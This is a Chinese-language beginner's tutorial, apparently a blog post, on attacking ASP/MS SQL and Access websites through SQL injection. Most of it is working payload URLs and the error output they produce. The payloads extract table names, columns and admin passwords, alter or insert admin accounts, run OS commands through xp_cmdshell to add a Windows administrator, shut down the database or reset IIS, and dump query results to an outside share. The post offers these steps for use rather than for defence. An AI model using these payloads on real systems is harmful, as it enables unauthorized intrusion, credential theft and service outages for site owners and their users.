`
sogotobj
  • 浏览: 617609 次
  • 性别: Icon_minigender_2
  • 来自: 北京
文章分类
社区版块
存档分类
最新评论

菜鸟SQL注入详解

阅读更多

菜鸟SQL注入详解
网上有很多高手GG们写的利用SQL注入如何去黑网站的,偶看了,嘿嘿。
不过可能对于一些初学者而且,有点难。在这里,小林想把这个过时的
东东作一次全面的交待,尽量让没有编程基础的DDMM们很快的拿握这门技术。
利用SQL进行添加,更改,查看记录。

网上有很多高手GG们写的利用SQL注入如何去黑网站的,偶看了,嘿嘿。
不过可能对于一些初学者而且,有点难。在这里,小林想把这个过时的
东东作一次全面的交待,尽量让没有编程基础的DDMM们很快的拿握这门技术。
利用SQL进行添加,更改,查看记录。

当一台主机台开了80端口,当你手头没有任何黑客工具,那么,偶们有SQL。
他不需要你其他东东,只要一个浏览器就够了。HOHO,偶的文章菜菜,偶写这
篇文章只是为了让一些对SQL很陌生的菜菜们看的,老鸟绕道。。。

1,什么是SQL注入?

SQL注入,就是利用欺骗的方式,通过网页的查询功能,或查询命令注入。
当用户来到网站,会提交一些数据,再到数据库进行查询,确定此用户的身份。
举个简单的例子来说吧,你去一个站点的论坛,那么,你会输入你的用户名和
密码,点“确定”,网站会通过数据库的查询来判断你是不是他们的用户,
你的用户名和密码是否正确。而利用SQL注入,通过构造特殊的语句,来查找我
们所想要得到的信息,如管理员的帐号密码。以下,小林用了http://xxx.xxx.com
来表示一个存在注入漏洞的网页。


2,助手篇,
先把IE菜单-工具-Internet选项-高级-显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,我们都只能看到“HTTP 500服务器错误”,不能获得更多的提示信息


3,哪些网页能利用?
我们去找一些要提交数据的网页,如:登陆页面,查找页面,添加页面等
找到后,如果你注意过网页的源代码,那么,你会发现,他上面一般有一个如下的表单:


这些网页,后缀如asp,jsp,cgi,php网页。
如:http://xxx.xxx.com/index.asp?id=10
上面这个例子,就是ASP页后,看到他的ID还的值了吗?是10。一般,我们找的就是这些页面
来练手了。(要做个好人噢。(^_^)像小林一样的好人。)

4,怎么测试它是存在注入漏洞的呢?这一步偶称它为“踩点”。
小林有一个毛病,看什么网页,就要顺手在参数(如上面的10)上加一个小小的引号。
http://xxx.xxx.com/index.asp?id=10
返回错误信息:

Microsoft OLE DB Provider for SQL Server 错误 80040e14

字符串 之前有未闭合的引号。

/job/grxx.asp,行141

这就是说,他用的是MsSQL数据库。这个引号,导致引号未闭合的错误。本身就是错的,因为
通常一个整数是不用在SQL里加引号的。

如果他不是一个整数而是字母呢?

http://xxx.xxx.com/index.asp?user=lamb

那我们就把引号放到lamb中间,如lamb
呵呵,又出错了吧?

这说明,站点这一部分的代码是大有问题的(当然,就算他有源码公布在网上,我也懒得看)

当然,我们也可以提交:
http://xxx.xxx.com/index.asp?id=10 ;AND columnaaa=5 (注,这里的columnaaa是我乱写的)
出现错误信息:

Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14

[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name columnaaa.

/job/grxx.asp,行27
这说明,这是一个SQL,里面没有columnaaa这个字段(我习惯说“列”)。

利用出错的信息,我们现在多少了解了这个站点的服务了吧?

5,现在开工啦,偶不喜欢猜测他的字段名,太浪费TIME了,我们要想办法让数据查询中出错。
要产生一个错误让它自己报出数据库里的值。让我们用一用SQL语法GROUP BY 或HAVING。如:

http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--

出现错误信息:
Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14

[Microsoft][ODBC SQL Server Driver][SQL Server]Column article.newsid is invalid in the

select list because it is not contained in an aggregate function and there is no GROUP BY

clause.

/more.asp,行27

看到article.newsid了吗?说明有一个叫article.newsid的列,因为你在用HAVING,所以你必须还要用

上GROUP BY,于是黑客就重复错误提交,直到没有得到错误。
这里要说明一下:分号在这里分离,%20 是空格,--表示后面是一个注释,也就是说只是说明,不能去

执行代码。(*_*)

下面是具体例子:

提交:
http://xxx.xxx.com/job/grxx.asp?id=23%20HAVING%201=1--
得到article.newsid这真是好东西。
提交:
http://xxx.xxx.com/job/grxx.asp? ... id%20having%201=1--
得到错误信息:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Column article.title is invalid in the

select list because it is not contained in either an aggregate function or the GROUP BY

clause.

/more.asp,line 20

得到:
article.title
我们反复地一个一个加上来提交。
得到错误信息:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]Column adm.userName is invalid in the

select list because it is not contained in either an aggregate function or the GROUP BY

clause.

/more.asp,line 56

这里要注意了,都到哪儿了?到下一个表了。
现在我们知道这里至少有2个表,他们的别名是:adm和article,如里面article对应的是:newsid等

title

利用系统表:

下面,我们要确定表名来加入数据。
系统表是MS-SQL 2000的一部分,名叫sysObjects table,我们将要用到查询UNION SELECT,。
要从SysObjects table 有天地拿到表名,一般使用下面语句:
SELECT name FROM sysObjects WHERE xtype=U U是指明定议USER的表。
黑客们已经知道了表里的列,
现在他们能在下面加一些数字。甚至如下面的:

在地址栏里打入:

http://xxx.xxx.com/job/grxx.asp?id=23%20UNION%20ALL%20SELECT% ;
201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype=U--
记住,上面的,1-6数据中,6是我们想要的。不过有时候会出现数据类型错误,

http://xxx.xxx.com/job/grxx.asp?id=23%20SELECT ;TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES--

MS SQL服务将试图去转换一个string (nvarchar)到integer。那么就会出错:

Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

table1 to a column of data type int.
/index.asp, line 5

这个错误信息很“友好”地告诉我们string (nvarchar)值不能被转换成integer。
这样,我们就获得了数据表的第一个表名!这个表名就是tabel1。


要获得第二个表名,我们继续,用以下查询:
http://xxx.xxx.com/job/grxx.asp?id=23%20UNION ;SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (table1)--

也可以用关键字查找数据:
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE %25ADMIN%25--
现在错误信息:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

admin_login to a column of data type int.
/index.asp, line 5

寻找与之匹配的值,%25ADMIN%25在SQL服务器上将被认作 %ADMIN%。这样,我们就能获得符合标
准的表名为"admin_login"的表了。

那么,如何获得表里所有的列表?

我们能利用另一个有用的东东,INFORMATION_SCHEMA.COLUMNS 出场!!!
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login--

现在错误信息:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

u_id to a column of data type int.
/index.asp, line 6
看,我们有了第一个字段的名,我们用NOT IN () 来获得下一个字段名:
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login WHERE COLUMN_NAME NOT IN

(u_id)--
现在错误信息:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

u_name to a column of data type int.
/index.asp, line 5
我们继续,获得其他列表。如:"password"等,因为我们获得下面错误信息:
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=admin_login WHERE COLUMN_NAME NOT IN

(u_id,u_name,password,contents)--
现在错误信息:
Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select

list if the statement contains a UNION operator.
/index.asp, line 5
6。2 如何找到我们要找的重要数据呢?
现在我们知道了表名,字段名,我们用相同的方法收集我们要的在数据库里的信息。
现在,我们从"admin_login" 表里取得第一个u_name :
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 u_name FROM admin_login--
现在错误信息:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

adminroot to a column of data type int.
/index.asp, line 5

我们知道,这里有登陆的用户名叫 "adminroot"的管理员。最后,从数据库里获得"adminroot" 的密码


http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 password FROM admin_login where

u_name=adminroot--
现在错误信息:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

root to a column of data type int.
/index.asp, line 5
我们现在能用户名"adminroot"密码:"root"登陆了。


如何取得数字的值?

以上技术描述有有一定的局限性。当我们试图转换文本组成有效的数字0-9我们不能得到任何错误。
让我们说说如何获得"tony"的密码,密码是 "19840217":
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 password FROM admin_login where

u_name=tony--
我们很可能发现,该页无法显示的错误。这结果表示,密码"19840217"被修改到一个数了。在整
合一个整型(10 也是),因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。
我们就得不到数字的登陆了。
要解决这个问题,我们能附加一些字母来测试转换失败。我们用以下的测试来代替:
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 convert(int,

password%2b%20lambgirl) FROM admin_login where u_name=tony--

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+ = 0x2b
我们将添加空格在密码里。所以,如果把我们的密码是19840217。他将变成19840217 lambgirl.
调出了转换了的函数。试着将19840217 lambgirl转变成整型。SQL服务将出现ODBC错误:
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

19840217 lambgirl to a column of data type int.
/index.asp, line 5
现在,你就能用tony和密码:19840217 lambgirl了。


如何在数据库修改,插入数据?
当我们成功地获得了表名,字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot"
的密码,我们

http://xxx.xxx.com/job/grxx.asp?id=23 ;UPDATE admin_login SET password = newpas5 WHERE

u_name=adminroot--

要在数据表里插入新记录,

http://xxx.xxx.com/job/grxx.asp?id=23 ;INSERT INTO admin_login (u_id, u_name,

password, contents) VALUES (123,xiaolin,pas,lambgirl)--
现在,我们就能用xiaolin pas 来登陆了。


如何远程执行SQL漏洞?

能进行SQL注入命令表明,我们能查任何我们想要查的。默认安装的的MS SQL服务
在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell 来执行远程破坏:
; exec master..xp_cmdshell ping 192.168.0.2--

(如果单引号不能用,就换成双引号)

分号表示结束前面的SQL查询,从而允许你开始另一个新的SQL命令。
为了检验命令成功执行,你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。

#tcpdump icmp
如果你没有接到PING主机的回应,得到一个错误的提示,权限错误,那么,很可能管理员
限制了WEB用户对xp_cmdshell 等的权限。

如何找出MYSQL查询结果?
这很容易用sp_makewebtask来把你查询的结果放到一个HTML里:
; EXEC master..sp_makewebtask "192.168.0.2sharegirlxiaolin.html", "SELECT * FROM

INFORMATION_SCHEMA.TABLES"
但是目标IP必须共享文件夹。


http://xxx.xxx.com/job/grxx.asp?id=23 ;;exec master..xp_cmdshell “net user name
password /add”--

xp_cmdshell 用于调用系统命令,于是,用net命令新建了用户名为name、密码为password
的windows的帐号,接着:
http://xxx.xxx.com/job/grxx.asp?id=23 ;;exec master..xp_cmdshell “net localgroup name

administrators /add”--
将新建的帐号name加入管理员组,不过这种方法只于用sa连接数据库的情况,否则,没有权限调用

xp_cmdshell。

其他方面,如利用SQL的命令填写:
将使SQL服务快速关闭
用户名: ; shutdown with nowait; --
密码: 不填

导致严重问题,网络故障。
用户名: ; exec master..xp_cmdshell iisreset; --
密码:不填

关于ACCESS部分,

和ASSQL差不了多少,也是先在http://xxx.xxx.com/index.asp?id=10

出错的话,继续提交:
先测试是否有ADMIN表,
http://xxx.xxx.com/index.asp?id=10 and 0<>(select count(*) from admin)

http://xxx.xxx.com/index.asp?id=10 and 1=(select count(*) from admin)
没有的话,就换一个名字,如user啊,什么的。再猜里面是否有username这个字段.

and 1=(select count(*) from admin where len(username)>0)
如果出错,同理,我们也可以给它换一个名字。
接下来我们猜用户的具体名字。
and 1=(select count(*) from admin where left(username,1)=l)
这时我们可以一个一个地来猜。
and 1=(select count(*) from admin where left(username,2)=la)
接下来猜密码,猜密码的道理同猜用户名一样。
and 1=(select count(*) from admin where left(password,1)=l)


分享到:
评论

相关推荐

    SQL注入全面讲解技术文档

    SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的...11.菜鸟入门级:SQL注入攻击 39 12. SQL注入渗透某网络安全公司的网站全过程 42 13.利用SQL注入2分钟入侵网站全程实录 45

    SQL注入天书

    SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 sql注入的原理分析 非常好的理解sql注入的...

    sql注入常识和防范

    SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。 但是,SQL注入的...

    防sql注入和xss攻击, springmv拦截器

    防sql注入和xss攻击, springmv拦截器,可自由调整需要拦截的字符

    SQL注入基础2.pdf

    SQL注入基础2,提供给菜鸟使用。本材料对于网络攻防演练学习有很重要的学习。

    SQL注入漏洞全接触

    用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前...

    菜鸟注入教程

    菜鸟注入教程,基础级菜鸟SQL注入教程。

    sql注入自学指南

    大概目录: sql注入原理 手工注入php+mysql参数与技巧 后台安全(万能密码) php+mysql注入查表(字段)语句 ... 等等共25章

    菜鸟级SQL21天自学通

    Sql语句入门的好资料,菜鸟级SQL21天自学通

    网站初级SQL手工注入

    这里只是给出一个下载地址; 仅适合菜鸟观看,不懂SQL手工注入的人观看; 同时还列出了 用 Google 搜索网站后台的过程! 比较简单!

    菜鸟教程 sql教程

    收录 菜鸟教程的 sql教程

    菜鸟级SQL21天自学通.pdf

    菜鸟级SQL21天自学通.pdf菜鸟级SQL21天自学通.pdf菜鸟级SQL21天自学通.pdf菜鸟级SQL21天自学通.pdf菜鸟级SQL21天自学通.pdf菜鸟级SQL21天自学通.pdf菜鸟级SQL21天自学通.pdf

    SQL注入基础1.pdf

    SQL注入基础学习,提供给菜鸟使用。对于网络的攻防演练有很大的作用。

    网络注入教材

    SQL注入教材,让菜鸟起飞的摇篮! 快去下载把

    SQL_Server_2000菜鸟入门_sqlserver_

    适用于sqlserver2000初学者的学习资料,讲了安装与存储过程。

    手工sql注入

    菜鸟学习的基础,目前大部分网站安全系数足以防止sql注入,只作为学习使用.doc

    SQL游标的使用详解

    本文讲述了SQL游标的应用,首先详细讲述游标的用法,而后通过实例解释游标的用法.

    SQL Server 2000菜鸟进阶

    这是对初学者数据库SQLServer2000最好的帮助工具

Global site tag (gtag.js) - Google Analytics